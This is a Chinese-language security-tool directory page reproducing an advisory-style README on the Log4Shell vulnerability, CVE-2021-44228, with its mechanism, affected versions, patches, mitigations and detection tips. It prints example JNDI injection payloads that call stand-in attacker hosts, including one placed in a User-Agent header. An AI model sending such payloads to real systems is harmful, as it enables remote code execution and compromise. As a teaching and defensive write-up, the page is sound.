Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228 — CVE-2021-44228 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2021-44228
漏洞分析漏洞利用Web应用程序漏洞利用威胁情报学习与教育精选资源
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

查看仓库
22个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2021-44228 — “Log4Shell”

ChatGPT Image Jun 14, 2026, 02_56_45 PM

严重性 CVSS 类型 日期

Apache Log4j 2 中的一个关键远程代码执行漏洞,广泛被称为 Log4Shell。


📖 目录

  • 概述
  • 技术细节
  • 严重性与 CVSS
  • 受影响版本
  • 利用与影响
  • 现实世界影响
  • 检测
  • 缓解与修复
  • 总结

🔎 概述

CVE-2021-44228 是 :contentReference[oaicite:0]{index=0} 版本 2.x(2.15.0 之前)中的一个关键 RCE 漏洞,于 2021 年 12 月被发现。

它允许未认证的远程攻击者通过向被 Log4j 记录的输入发送特制字符串,在易受攻击的系统上执行任意代码。该漏洞影响全球无数基于 Java 的应用程序和服务。


🧠 技术细节

该漏洞源于 Log4j 对日志字符串中 JNDI 查询的处理。攻击者可以在记录的消息中嵌入一个恶意的 JNDI 资源(例如 LDAP、DNS),如下所示:

root@kitploit:~

${jndi:ldap://attacker.com/a}

Log4j 将:

  1. 从输入中解析 JNDI 查询
  2. 向攻击者控制的服务器执行远程查询
  3. 在查询过程中加载恶意 Java 代码
  4. 在受影响应用程序的上下文中执行该代码

这使得攻击者能够在受影响的服务上实现完全的 远程代码执行 (RCE)。


📊 严重性与 CVSS

由于 Log4j 被无数库和应用程序使用,任何记录不可信数据的系统都可能存在漏洞。


📦 受影响版本

以下 Log4j 2 版本 存在漏洞:

root@kitploit:~

>= 2.0-beta9 且 < 2.15.0

此外,2.15.0 的某些配置仍可被利用,因此 2.16.0 及更高版本是安全基线。


🛠 修复与修复方案

✅ 官方修复版本

更新到 Log4j 2 版本:

root@kitploit:~

2.17.1 或更高版本

后续补丁进一步提高了安全性(例如 2.17.2、2.19.0 等)。


🧱 临时缓解措施(如果无法立即修补)

如果无法立即升级,您可以:

  • 在 Log4j 配置中禁用 JNDI 查询
  • 设置:
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • 从类路径中删除 JndiLookup 类:
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

这些步骤有助于在您能够更新之前减少暴露。


🔥 利用与影响

nessus3 nessus4 nessus5

此漏洞极易利用。攻击者只需发送一个被应用程序记录的构造字符串(例如通过 HTTP 头部、表单参数、聊天消息、数据库字段):

root@kitploit:~

User-Agent: ${jndi:ldap://attacker.example/a}

一旦被记录,应用程序将执行远程查询,并可被强制执行攻击者控制的 Java 代码。


🌍 现实世界影响

Log4Shell 在全球产生了巨大影响:

  • 无数面向公众的服务立即暴露
  • 云服务商、游戏服务器、企业应用程序、物联网、网络服务、API 等均受影响
  • 整个安全社区动员起来检测和修补易受攻击的系统
  • 漏洞利用广泛、自动化且迅速

这是 几十年来最重大的漏洞之一。


🧪 检测

您可以通过以下方式检测易受攻击的系统:

  • 扫描日志中可疑的 JNDI 模式(${jndi:)
  • 使用检查 Log4j 版本的漏洞扫描器
  • 监控传入流量是否存在利用尝试
  • 检查类路径内容是否支持 JNDI 查询

📌 总结


⚠️ 最终建议

如果您的应用程序或您使用的任何库依赖于 Log4j 2.x,请立即更新到已修补的版本(≥ 2.17.1),并验证 JNDI 查询已禁用或在可能的情况下删除。

下载工具
指标详情
CVSS v3.1 基础分数10.0(关键)
攻击向量网络
所需权限无
用户交互无
认证不需要
影响完全 RCE
字段值
CVE IDCVE-2021-44228
昵称Log4Shell
产品Apache Log4j 2
严重性关键(CVSS 10.0)
类型远程代码执行
影响完全系统沦陷
可利用性极易
缓解措施修补到 ≥ 2.17.1